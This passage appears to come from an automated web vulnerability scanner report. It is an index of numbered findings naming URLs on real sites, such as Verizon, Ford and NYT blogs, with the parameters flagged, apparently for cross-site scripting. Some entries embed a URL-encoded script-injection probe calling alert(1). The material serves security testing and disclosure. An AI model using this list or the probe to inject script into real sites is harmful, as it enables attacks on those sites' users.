2.261. http://bp2.forddirect.fordvehicles.com/2011-Ford-SuperDuty/ChooseYourPath/ [lang parameter]

2.262. http://bp2.forddirect.fordvehicles.com/2011-Ford-SuperDuty/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.263. http://bp2.forddirect.fordvehicles.com/2011-Ford-SuperDuty/ChooseYourPath/ [referringSite parameter]

2.264. http://bp2.forddirect.fordvehicles.com/2011-Ford-Taurus/ChooseYourPath/ [branding parameter]

2.265. http://bp2.forddirect.fordvehicles.com/2011-Ford-Taurus/ChooseYourPath/ [lang parameter]

2.266. http://bp2.forddirect.fordvehicles.com/2011-Ford-Taurus/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.267. http://bp2.forddirect.fordvehicles.com/2011-Ford-Taurus/ChooseYourPath/ [referringSite parameter]

2.268. http://bp2.forddirect.fordvehicles.com/2011-Ford-TransitConnect/ChooseYourPath/ [branding parameter]

2.269. http://bp2.forddirect.fordvehicles.com/2011-Ford-TransitConnect/ChooseYourPath/ [lang parameter]

2.270. http://bp2.forddirect.fordvehicles.com/2011-Ford-TransitConnect/ChooseYourPath/ [name of an arbitrarily supplied request parameter]

2.271. http://bp2.forddirect.fordvehicles.com/2011-Ford-TransitConnect/ChooseYourPath/ [referringSite parameter]

2.272. http://bucks.blogs.nytimes.com/2010/11/19/requiring-brokers-to-put-their-customers-first/ [src parameter]

2.273. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/download/tour_playerOct09.html [REST URL parameter 5]

2.274. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [Bitrate parameter]

2.275. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [Bitrate parameter]

2.276. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [Channel parameter]

2.277. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [Channel parameter]

2.278. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [ClipId parameter]

2.279. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [ClipId parameter]

2.280. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [Format parameter]

2.281. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [Format parameter]

2.282. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 3]

2.283. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 3]

2.284. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 4]

2.285. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 4]

2.286. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [_pageLabel parameter]

2.287. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [_pageLabel parameter]

2.288. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [customRedirect parameter]

2.289. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [helpPagenew parameter]

2.290. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [name of an arbitrarily supplied request parameter]

2.291. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [name of an arbitrarily supplied request parameter]

2.292. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [pageLabel parameter]

2.293. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [portletTitle parameter]

2.294. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [redirectUrl parameter]

2.295. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [refId parameter]

2.296. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [vdoId parameter]

2.297. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_federatedMediaBlog [REST URL parameter 3]

2.298. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_federatedMediaBlog [REST URL parameter 4]

2.299. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_federatedMediaBlog [REST URL parameter 5]

2.300. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_weather [REST URL parameter 3]

2.301. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_weather [REST URL parameter 4]

2.302. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_weather [REST URL parameter 5]

2.303. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_businessNews [REST URL parameter 3]

2.304. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_businessNews [REST URL parameter 4]

2.305. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_businessNews [REST URL parameter 5]

2.306. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_topHeadlines [REST URL parameter 3]

2.307. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_topHeadlines [REST URL parameter 4]

2.308. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_topHeadlines [REST URL parameter 5]

2.309. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/Scottrade_1 [REST URL parameter 3]

2.310. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/Scottrade_1 [REST URL parameter 4]

2.311. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/Scottrade_1 [REST URL parameter 5]

2.312. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/VerizonDiscountProgram_2 [REST URL parameter 3]

2.313. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/VerizonDiscountProgram_2 [REST URL parameter 4]

2.314. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/VerizonDiscountProgram_2 [REST URL parameter 5]

2.315. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_categoryPanel [REST URL parameter 3]

2.316. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_categoryPanel [REST URL parameter 4]

2.317. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_categoryPanel [REST URL parameter 5]

2.318. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_resourceLinks [REST URL parameter 3]

2.319. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_resourceLinks [REST URL parameter 4]

2.320. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_resourceLinks [REST URL parameter 5]

2.321. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_solutionrecommender [REST URL parameter 3]

2.322. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_solutionrecommender [REST URL parameter 4]

2.323. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_solutionrecommender [REST URL parameter 5]

2.324. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_verizonBusinessRewards [REST URL parameter 3]

2.325. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_verizonBusinessRewards [REST URL parameter 4]

2.326. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_verizonBusinessRewards [REST URL parameter 5]

2.327. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_verizonDiscountProgram [REST URL parameter 3]

2.328. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_verizonDiscountProgram [REST URL parameter 4]

2.329. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/mkp_landing_verizonDiscountProgram [REST URL parameter 5]

2.330. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_10 [REST URL parameter 3]

2.331. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_10 [REST URL parameter 4]

2.332. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_10 [REST URL parameter 5]

2.333. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_11 [REST URL parameter 3]

2.334. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_11 [REST URL parameter 4]

2.335. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/portletInstance_11 [REST URL parameter 5]

2.336. http://c.brightcove.com/services/messagebroker/amf [2nd AMF string parameter]

2.337. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

2.338. http://cityroom.blogs.nytimes.com/2010/11/19/casting-spells-at-columbus-circle/ [src parameter]

2.339. http://cityroom.blogs.nytimes.com/2010/11/19/driver-of-school-bus-arrested-after-accusations-of-sex-abuse/ [src parameter]

2.340. http://cityroom.blogs.nytimes.com/2010/11/19/the-week-in-pictures-for-nov-19/ [src parameter]

2.341. http://claimid.com/username [REST URL parameter 1]

2.342. http://clicktoverify.truste.com/pvr.php [sealid parameter]

2.343. http://cms.bbb.org/wwwroot/js/global.js [REST URL parameter 1]

2.344. http://cms.bbb.org/wwwroot/js/global.js [REST URL parameter 2]

2.345. http://cms.bbb.org/wwwroot/js/global.js [REST URL parameter 3]

2.346. http://community.thinkfinity.org/community/professionaldevelopment [frame parameter]

2.347. http://content.usatoday.net/dist/custom/gci/InsidePage.aspx [cId parameter]

2.348. http://dealbook.nytimes.com/2010/11/19/as-tech-deals-boom-talk-turns-to-bubbles/ [src parameter]

2.349. http://dealbook.nytimes.com/2010/11/19/in-canada-you-drive-g-m-but-trade-gmm/ [src parameter]

2.350. http://dealbook.nytimes.com/2010/11/19/no-threats-here-financial-firms-tell-u-s/ [src parameter]

2.351. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]

2.352. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]

2.353. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 4]

2.354. http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter]

2.355. http://digg.com/login [REST URL parameter 1]

2.356. http://digg.com/remote-submit [REST URL parameter 1]

2.357. http://digg.com/submit [REST URL parameter 1]

2.358. http://ds.addthis.com/red/psi/p.json [callback parameter]

2.359. http://ds.addthis.com/red/psi/sites/smallbusiness.verizon.com/p.json [callback parameter]

2.360. http://ds.addthis.com/red/psi/sites/thompson.blog.avg.com/p.json [callback parameter]

2.361. https://ebillpay.verizonwireless.com/vzw/accountholder/account/maint-features.do [REST URL parameter 2]

2.362. https://ebillpay.verizonwireless.com/vzw/accountholder/account/maint-features.do [REST URL parameter 3]

2.363. https://ebillpay.verizonwireless.com/vzw/accountholder/account/maint-features.do [REST URL parameter 4]

2.364. https://ebillpay.verizonwireless.com/vzw/accountholder/account/maint-features.do [name of an arbitrarily supplied request parameter]

2.365. https://ebillpay.verizonwireless.com/vzw/accountholdere81b3%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec38e61d6c8d/account/maint-features.do [REST URL parameter 2]

2.366. https://ebillpay.verizonwireless.com/vzw/accountholdere81b3%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec38e61d6c8d/account/maint-features.do [REST URL parameter 2]

2.367. https://ebillpay.verizonwireless.com/vzw/accountholdere81b3%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec38e61d6c8d/account/maint-features.do [REST URL parameter 3]

2.368. https://ebillpay.verizonwireless.com/vzw/accountholdere81b3%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec38e61d6c8d/account/maint-features.do [REST URL parameter 3]

2.369. https://ebillpay.verizonwireless.com/vzw/accountholdere81b3%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec38e61d6c8d/account/maint-features.do [REST URL parameter 4]

2.370. https://ebillpay.verizonwireless.com/vzw/accountholdere81b3%22%3E%3Cscript%3Ealert(1)%3C/script%3Ec38e61d6c8d/account/maint-features.do [REST URL parameter 5]

2.371. http://economix.blogs.nytimes.com/2010/11/19/big-companies-hiring-small-companies-arent-gallup-finds/ [src parameter]

2.372. https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketMainDispatch.do [serviceId parameter]

2.373. https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketMainDispatch.do [serviceType parameter]

2.374. https://espanol.vzw.com/enes/sdmyaccount/clp/login [name of an arbitrarily supplied request parameter]

2.375. http://espn.go.com/espn3/index/_/sport/golf [REST URL parameter 5]

2.376. http://espn.go.com/espn3/index/_/sport/golf [REST URL parameter 5]

2.377. http://fanhouse.com/ [name of an arbitrarily supplied request parameter]

2.378. http://fanhouse.com/ [name of an arbitrarily supplied request parameter]

2.379. http://fantasyfootball.fanhouse.com/ [name of an arbitrarily supplied request parameter]

2.380. http://fantasyfootball.fanhouse.com/2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/ [REST URL parameter 3]

2.381. http://fantasyfootball.fanhouse.com/2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/ [REST URL parameter 3]

2.382. http://fantasyfootball.fanhouse.com/2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/ [name of an arbitrarily supplied request parameter]

2.383. http://fantasyfootball.fanhouse.com/2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/ [name of an arbitrarily supplied request parameter]

2.384. http://fantasyfootball.fanhouse.com/2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/ [synd parameter]

2.385. http://fantasyfootball.fanhouse.com/2010/11/19/injury-spin-cycle-matt-schaub-practices-expected-to-start/ [synd parameter]

2.386. http://fifthdown.blogs.nytimes.com/2010/11/19/at-home-jets-look-for-noise-and-hope-to-roar/ [src parameter]

2.387. http://finance.moneyandmarkets.com/roi/x-list.php [ec parameter]

2.388. http://finance.moneyandmarkets.com/roi/x-list.php [sc parameter]

2.389. http://fivethirtyeight.blogs.nytimes.com/2010/11/19/the-800-pound-mama-grizzly-problem/ [src parameter]

2.390. http://gadgetwise.blogs.nytimes.com/2010/11/19/apps-to-amuse-kiddies-for-miles-and-miles/ [src parameter]

2.391. http://gadgetwise.blogs.nytimes.com/2010/11/19/earbuds-with-a-mic-that-sound-about-right/ [src parameter]

2.392. http://gadgetwise.blogs.nytimes.com/2010/11/19/from-bucks-the-more-convenient-gift-card/ [src parameter]

2.393. http://gadgetwise.blogs.nytimes.com/2010/11/19/satellite-radio-without-the-clutter/ [src parameter]

2.394. http://games.verizon.com/do/gameList [search parameter]

2.395. http://games.verizon.com/do/gameList [searchTag parameter]

2.396. http://games.verizon.com/trivia/widget/embed.jsp [gameId parameter]

2.397. http://games.verizon.com/trivia/widget/embed_toolbar.jsp [gameId parameter]

2.398. http://goal.blogs.nytimes.com/2010/11/19/f-c-dallass-ferreira-named-m-l-s-m-v-p/ [src parameter]

2.399. http://green.blogs.nytimes.com/2010/11/19/a-warning-about-climate-change-from-a-departing-republican/ [src parameter]

2.400. http://headlines.verizon.com/headlines/portals/headlines.portal [_article parameter]

2.401. http://headlines.verizon.com/headlines/portals/headlines.portal [_pageLabel parameter]

2.402. http://headlines.verizon.com/headlines/portals/headlines.portal [_photoid parameter]

2.403. http://headlines.verizon.com/headlines/portlets/horoscope/getContent.jsp [horoSign parameter]

2.404. http://ib.adnxs.com/ptj [redir parameter]

2.405. http://img.mediaplex.com/content/0/11918/115416/en_AC_WtWbanners_300x250_loader_c02.html [mpck parameter]

2.406. http://img.mediaplex.com/content/0/11918/115416/en_AC_WtWbanners_300x250_loader_c02.html [mpck parameter]

2.407. http://img.mediaplex.com/content/0/11918/115416/en_AC_WtWbanners_300x250_loader_c02.html [mpvc parameter]

2.408. http://img.mediaplex.com/content/0/11918/115416/en_AC_WtWbanners_300x250_loader_c02.html [mpvc parameter]

2.409. http://img.mediaplex.com/content/0/14302/93015/trust_live_120x600.js [mpck parameter]

2.410. http://img.mediaplex.com/content/0/14302/93015/trust_live_120x600.js [mpvc parameter]

2.411. http://img.mediaplex.com/content/0/14302/93015/trust_live_120x600.js [placementid parameter]

2.412. http://img.mediaplex.com/content/0/711/112902/80234_eBay_Q4_2010_Holiday_NDA_Default_728x90.js [mpck parameter]

2.413. http://img.mediaplex.com/content/0/711/112902/80234_eBay_Q4_2010_Holiday_NDA_Default_728x90.js [mpvc parameter]

2.414. https://login.verizonwireless.com/amserver/UI/Login [goto parameter]

2.415. http://news.aol.com/videos/video-hub/ [REST URL parameter 2]

2.416. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [REST URL parameter 4]

2.417. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [REST URL parameter 5]

2.418. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [REST URL parameter 6]

2.419. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [audio_conf parameter]

2.420. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [bbaw parameter]

2.421. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [connex parameter]

2.422. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [fiostvown parameter]

2.423. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [fiosvoice parameter]

2.424. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [msp parameter]

2.425. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [name of an arbitrarily supplied request parameter]

2.426. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [npa parameter]

2.427. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [nxx parameter]

2.428. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [online_backup parameter]

2.429. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [partner parameter]

2.430. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popcity parameter]

2.431. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popcounty parameter]

2.432. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popdma parameter]

2.433. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popindicator parameter]

2.434. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popip parameter]

2.435. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popservice parameter]

2.436. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popstate parameter]

2.437. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [popzipcode parameter]

2.438. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [prizm parameter]

2.439. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [pts parameter]

2.440. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [pws parameter]

2.441. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [search parameter]

2.442. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [sec_email parameter]

2.443. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [smb_enh_msg parameter]

2.444. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [smb_premmail parameter]

2.445. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [usertype parameter]

2.446. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vasonly parameter]

2.447. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vec parameter]

2.448. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vgodfamily parameter]

2.449. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vgodunlim parameter]

2.450. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [viss parameter]

2.451. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [vsbb parameter]

2.452. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [webex parameter]

2.453. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [webhosting parameter]

2.454. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [REST URL parameter 4]

2.455. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [REST URL parameter 5]

2.456. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [REST URL parameter 6]

2.457. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [REST URL parameter 6]

2.458. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [audio_conf parameter]

2.459. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [bbaw parameter]

2.460. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [connex parameter]

2.461. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [fiostvown parameter]

2.462. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [fiosvoice parameter]

2.463. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [msp parameter]

2.464. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [name of an arbitrarily supplied request parameter]

2.465. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [npa parameter]

2.466. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [nxx parameter]

2.467. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [online_backup parameter]

2.468. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [partner parameter]

2.469. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [popcity parameter]

2.470. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [popcounty parameter]

2.471. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [popdma parameter]

2.472. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [popindicator parameter]

2.473. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [popip parameter]

2.474. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [popservice parameter]

2.475. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [popstate parameter]

2.476. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [popzipcode parameter]

2.477. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [prizm parameter]

2.478. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [pts parameter]

2.479. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [pws parameter]

2.480. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [search parameter]

2.481. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [sec_email parameter]

2.482. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [smb_enh_msg parameter]

2.483. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [smb_premmail parameter]

2.484. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [usertype parameter]

2.485. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [vasonly parameter]

2.486. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [vec parameter]

2.487. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [vgodfamily parameter]

2.488. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [vgodunlim parameter]

2.489. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [viss parameter]

2.490. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [vsbb parameter]

2.491. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [webex parameter]

2.492. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/4107@Top [webhosting parameter]

2.493. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [REST URL parameter 4]

2.494. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [REST URL parameter 5]

2.495. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [REST URL parameter 6]

2.496. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [REST URL parameter 6]

2.497. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [audio_conf parameter]

2.498. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [bbaw parameter]

2.499. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [connex parameter]

2.500. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [fiostvown parameter]

2.501. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [fiosvoice parameter]

2.502. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [msp parameter]

2.503. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [name of an arbitrarily supplied request parameter]

2.504. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [npa parameter]

2.505. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [nxx parameter]

2.506. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [online_backup parameter]

2.507. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [partner parameter]

2.508. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [popcity parameter]

2.509. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [popcounty parameter]

2.510. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [popdma parameter]

2.511. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [popindicator parameter]

2.512. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [popip parameter]

2.513. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [popservice parameter]

2.514. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [popstate parameter]

